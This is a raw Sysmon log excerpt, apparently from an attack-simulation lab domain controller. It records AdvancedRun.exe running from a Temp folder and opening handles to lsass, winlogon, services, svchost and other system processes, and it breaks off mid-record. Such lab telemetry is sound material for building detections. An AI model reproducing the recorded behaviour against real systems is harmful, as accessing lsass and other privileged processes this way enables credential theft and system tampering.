18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004011645Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011644Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004011643Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004011642Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004011641Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004011640Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004011639Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011638Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004011637Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011636Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004011635Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011634Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011633Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011632Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun